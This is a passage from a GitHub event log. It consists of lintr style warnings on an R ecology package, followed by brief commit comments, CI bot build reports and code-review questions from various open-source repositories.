^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L88) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L89) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:28:3:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L28) *warning:* **local variable ‘SADX’ assigned but may not be used**\n```r\n​  SADX <- c()\n  ^~~~\n```\n[R/generateData.R:29:3:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L29) *warning:* **local variable ‘SADY’ assigned but may not be used**\n```r\n​  SADY <- c()\n  ^~~~\n```\n[R/generateData.R:36:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:36:66:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:37:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:18:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                 ^\n```\n[R/generateData.R:42:28:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/generateData.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n             ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:44:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                           ^~~~\n```\n[R/generateData.R:49:49:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                                ^\n```\n[R/generateData.R:55:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sadx <- generate.ZSM(theta, I_X, NX)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sady <- generate.ZSM(theta, I_Y, NY)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = sadx, guildY = sady)\n                ^\n```\n[R/generateData.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:64:38:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                     ^\n```\n[R/generateData.R:64:46:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                             ^\n```\n[R/generateData.R:64:48:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                               ^\n```\n[R/generateData.R:66:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  b <- lgamma(theta_x + theta_y + J) - \n                                      ^\n```\n[R/generateData.R:68:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:71:32:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                              ~^~\n```\n[R/generateData.R:71:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                                ~^~\n```\n[R/generateData.R:72:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:76:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​localComm <- function(alpha_x, alpha_y, Jx, Jy, px) {\n^~~~~~~~~\n```\n[R/generateData.R:82:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:82:66:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:83:27:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:85:4:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L85) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(is.infinite(I_X) && is.infinite(I_Y)) {\n   ^\n```\n[R/generateData.R:86:29:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​     output <- exp( lgamma(J+1) - \n                           ~^~\n```\n[R/generateData.R:86:34:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​     output <- exp( lgamma(J+1) - \n                                 ^\n```\n[R/generateData.R:87:36:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(Jx + 1) + \n                                   ^\n```\n[R/generateData.R:89:35:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    Jx * log(nx) + \n                                  ^\n```\n[R/generateData.R:90:23:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/generateData.R#L90) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-Jx) * log(ny))\n                     ~^~\n```\n"}},"created_at":"2016-09-22T22:15:06Z"}
{"id":"4605439473","type":"CommitCommentEvent","actor":{"login":"trufae"},"repo":{"name":"aquynh/capstone"},"payload":{"comment":{"id":19137792,"position":null,"line":null,"path":null,"commit_id":"9b5f404d751d72a2e1cfe82e04fca0a3732bad30","created_at":"2016-09-22T22:15:30Z","updated_at":"2016-09-22T22:15:30Z","body":"looks like it’s green for travis https://travis-ci.org/radare/radare2/builds/161932064\n\nthanks!\n> On 22 Sep 2016, at 16:22, Nguyen Anh Quynh <notifications@github.com> wrote:\n> \n> arm: update imm in printOperand() to fix error reported by @trufae in PR #764\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/aquynh/capstone/commit/9b5f404d751d72a2e1cfe82e04fca0a3732bad30\n\n"}},"created_at":"2016-09-22T22:15:30Z"}
{"id":"4605439936","type":"CommitCommentEvent","actor":{"login":"matsbla"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19137793,"position":20,"line":20,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-22T22:15:37Z","updated_at":"2016-09-22T22:15:37Z","body":"How can we make the google charts responsive?"}},"created_at":"2016-09-22T22:15:37Z"}
{"id":"4605441478","type":"CommitCommentEvent","actor":{"login":"matsbla"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19137799,"position":35,"line":35,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-22T22:15:59Z","updated_at":"2016-09-22T22:15:59Z","body":"Where do you want to place the survey data?"}},"created_at":"2016-09-22T22:15:59Z"}
{"id":"4605442500","type":"CommitCommentEvent","actor":{"login":"Zhivko1985"},"repo":{"name":"Zhivko1985/Exercise"},"payload":{"comment":{"id":19137804,"position":null,"line":null,"path":null,"commit_id":"4de02e9c621ff137a2971ccfe98bebd9cfa20df7","created_at":"2016-09-22T22:16:14Z","updated_at":"2016-09-22T22:16:14Z","body":"?"}},"created_at":"2016-09-22T22:16:14Z"}
{"id":"4605444016","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19137807,"position":null,"line":null,"path":null,"commit_id":"71dfd99eafd83f80b853fcd189a598b4913cf0f1","created_at":"2016-09-22T22:16:34Z","updated_at":"2016-09-22T22:16:34Z","body":"Is the tuple conversion the only case? Do you mind adding a FIXME there so we can tighten up the null return later?\r\n\r\nIt should be easy to do the tuple conversion support in SILGen if you get the chance."}},"created_at":"2016-09-22T22:16:34Z"}
{"id":"4605456736","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19137846,"position":null,"line":null,"path":null,"commit_id":"c99bfaf3d09b1926603a7fef52187e89572a606c","created_at":"2016-09-22T22:19:37Z","updated_at":"2016-09-22T22:19:37Z","body":"👍 "}},"created_at":"2016-09-22T22:19:37Z"}
{"id":"4605460285","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-uiframework"},"payload":{"comment":{"id":19137851,"position":4,"line":143,"path":"omod/src/main/java/org/openmrs/module/uiframework/PageController.java","commit_id":"0fae0ea707cab3977ca49f3a58a2ffeb81a9061e","created_at":"2016-09-22T22:20:30Z","updated_at":"2016-09-22T22:20:30Z","body":"Will this preserve the query string or parameters? e.g ?app=coreapps.findPatient"}},"created_at":"2016-09-22T22:20:30Z"}
{"id":"4605468041","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19137868,"position":null,"line":null,"path":null,"commit_id":"235044893ce883f9abadbc58f99ca6882ff93589","created_at":"2016-09-22T22:22:22Z","updated_at":"2016-09-22T22:22:22Z","body":"omg, thanks for adding a test"}},"created_at":"2016-09-22T22:22:22Z"}
{"id":"4605469014","type":"CommitCommentEvent","actor":{"login":"Tangyuan1994"},"repo":{"name":"Tangyuan1994/hello-world"},"payload":{"comment":{"id":19137871,"position":null,"line":null,"path":null,"commit_id":"7d15e19a17204ab56c2a07db531e1bb9ffbeaf3f","created_at":"2016-09-22T22:22:36Z","updated_at":"2016-09-22T22:22:36Z","body":"qweqwe"}},"created_at":"2016-09-22T22:22:36Z"}
{"id":"4605470488","type":"CommitCommentEvent","actor":{"login":"arecarn"},"repo":{"name":"important-business/engine"},"payload":{"comment":{"id":19137873,"position":null,"line":null,"path":null,"commit_id":"868ae912b05c48fd31129f8aa9bf9c810478a0a5","created_at":"2016-09-22T22:22:58Z","updated_at":"2016-09-22T22:22:58Z","body":"Where do these get used?  I must have missed it."}},"created_at":"2016-09-22T22:22:58Z"}
{"id":"4605473925","type":"CommitCommentEvent","actor":{"login":"mnickhoo"},"repo":{"name":"mnickhoo/AirPlane"},"payload":{"comment":{"id":19137887,"position":null,"line":null,"path":null,"commit_id":"58071d1d2c3c69661ecd123e53550e4ffb960797","created_at":"2016-09-22T22:23:49Z","updated_at":"2016-09-22T22:23:49Z","body":"Share This Project"}},"created_at":"2016-09-22T22:23:49Z"}
{"id":"4605474842","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19137894,"position":null,"line":null,"path":null,"commit_id":"9f7073c21162fe6ff1ffd1d0964bb8f613806638","created_at":"2016-09-22T22:24:02Z","updated_at":"2016-09-22T22:24:02Z","body":"do you know how long we'll have this, I'd be pretty sad if I thought I had to restart browser for clearing cookies in general."}},"created_at":"2016-09-22T22:24:02Z"}
{"id":"4605481424","type":"CommitCommentEvent","actor":{"login":"cxhernandez"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19137915,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T22:25:42Z","updated_at":"2016-09-22T22:25:42Z","body":"Weird! I'll look into this now with Fs peptide. In my own mutual information benchmarks using Gaussian  data, I find that both `knn` and `grassberger` perform similarly well with mutual information:\r\n\r\n![mutinf-benchmark](https://cloud.githubusercontent.com/assets/5142365/18768145/11cce474-80d8-11e6-8105-93c210b5ef87.png)\r\n\r\nBut there's some bias in the `grassberger` entropy calculation that causes it to underestimate the true* \"normalized mutual information\":\r\n\r\n![nmutinf-benchmark](https://cloud.githubusercontent.com/assets/5142365/18768174/360a02ae-80d8-11e6-87ce-9ddca1046fe3.png)\r\n\r\n*true in this case is calculated via differential entropy"}},"created_at":"2016-09-22T22:25:42Z"}
{"id":"4605482193","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/CustomerTransaction1"},"payload":{"comment":{"id":19137918,"position":null,"line":null,"path":null,"commit_id":"a01c0a71e85d6d5cefffb4184b7e64dc762c5d50","created_at":"2016-09-22T22:25:53Z","updated_at":"2016-09-22T22:25:53Z","body":"![screen_2016-09-22 15 25 05](https://cloud.githubusercontent.com/assets/18017741/18768256/d2d1d2ba-80d8-11e6-8439-6a4f9b5f813e.jpg)\r\n"}},"created_at":"2016-09-22T22:25:53Z"}
{"id":"4605489835","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19137933,"position":null,"line":null,"path":null,"commit_id":"bfc48040efe7479a6aaf616faa59f4a0aa5e6370","created_at":"2016-09-22T22:27:49Z","updated_at":"2016-09-22T22:27:49Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2319 of 2493 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.02%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T22:27:49Z"}
{"id":"4605495740","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19137947,"position":null,"line":null,"path":null,"commit_id":"3da281d15fb47bd9f5acaa8c782ad86ba1fd1ba9","created_at":"2016-09-22T22:29:16Z","updated_at":"2016-09-22T22:29:16Z","body":"++"}},"created_at":"2016-09-22T22:29:16Z"}
{"id":"4605502575","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19137958,"position":null,"line":null,"path":null,"commit_id":"f85b91b0daca61bf5ee07214776853eb0591a95a","created_at":"2016-09-22T22:30:54Z","updated_at":"2016-09-22T22:30:54Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1788 of 1788 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T22:30:54Z"}
{"id":"4605510521","type":"CommitCommentEvent","actor":{"login":"somito4"},"repo":{"name":"somito4/somito4.github.io"},"payload":{"comment":{"id":19137977,"position":null,"line":null,"path":null,"commit_id":"bb0bde0c9b025f79a84c056b619c0509a6a061f0","created_at":"2016-09-22T22:32:57Z","updated_at":"2016-09-22T22:32:57Z","body":"fase1"}},"created_at":"2016-09-22T22:32:57Z"}
{"id":"4605512902","type":"CommitCommentEvent","actor":{"login":"AakashTakale"},"repo":{"name":"AakashTakale/Medical-Records-System-Software---MRSS"},"payload":{"comment":{"id":19137981,"position":null,"line":null,"path":null,"commit_id":"339d08191481af85e827464f18ea22a791cbf684","created_at":"2016-09-22T22:33:33Z","updated_at":"2016-09-22T22:33:33Z","body":"There is no way to run it without a Database.. \nThanks and Regards,\nAakash M TakaleComputer Science Graduate StudentCalifornia State University, FullertonFullerton, CA 92831+1 (714)-726-9305 |  \n\n    On Thursday, 22 September 2016 5:42 AM, davekamlesh <notifications@github.com> wrote:\n \n\n how i will run this without database—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.  \n\n   "}},"created_at":"2016-09-22T22:33:33Z"}
{"id":"4605515091","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19137989,"position":null,"line":null,"path":null,"commit_id":"8ce97bcbcc24249bcba082fcfcb132bb49213f25","created_at":"2016-09-22T22:34:09Z","updated_at":"2016-09-22T22:34:09Z","body":"Also see [Issue 300: Clang 3.9 and missing member definitions for template classes](http://github.com/weidai11/cryptopp/issues/300)."}},"created_at":"2016-09-22T22:34:09Z"}
{"id":"4605515816","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19137992,"position":null,"line":null,"path":null,"commit_id":"93ad8ea38e54a1f2b5467796059d4909afc8b7e9","created_at":"2016-09-22T22:34:19Z","updated_at":"2016-09-22T22:34:19Z","body":"Also see [Issue 300: Clang 3.9 and missing member definitions for template classes](http://github.com/weidai11/cryptopp/issues/300)."}},"created_at":"2016-09-22T22:34:19Z"}
{"id":"4605516535","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19137993,"position":null,"line":null,"path":null,"commit_id":"866e452bdb8597203f2ba2184b58cc9144c1c5c1","created_at":"2016-09-22T22:34:31Z","updated_at":"2016-09-22T22:34:31Z","body":"Also see [Issue 300: Clang 3.9 and missing member definitions for template classes](http://github.com/weidai11/cryptopp/issues/300)."}},"created_at":"2016-09-22T22:34:31Z"}
{"id":"4605516675","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19137994,"position":null,"line":null,"path":null,"commit_id":"f85b91b0daca61bf5ee07214776853eb0591a95a","created_at":"2016-09-22T22:34:34Z","updated_at":"2016-09-22T22:34:34Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T22:34:34Z"}
{"id":"4605517337","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19137996,"position":null,"line":null,"path":null,"commit_id":"99a83105bdfcc751de4074bda29fe24665e8788a","created_at":"2016-09-22T22:34:44Z","updated_at":"2016-09-22T22:34:44Z","body":"Also see [Issue 300: Clang 3.9 and missing member definitions for template classes](http://github.com/weidai11/cryptopp/issues/300)."}},"created_at":"2016-09-22T22:34:44Z"}
{"id":"4605517353","type":"CommitCommentEvent","actor":{"login":"codetricity"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19137997,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-22T22:34:44Z","updated_at":"2016-09-22T22:34:44Z","body":"super cool. Here's the link to [OSC API level 2 changes](https://developers.google.com/streetview/open-spherical-camera/v2changes), which significant. Fortunately, most cameras, including the THETA still support level 1.\r\n"}},"created_at":"2016-09-22T22:34:44Z"}
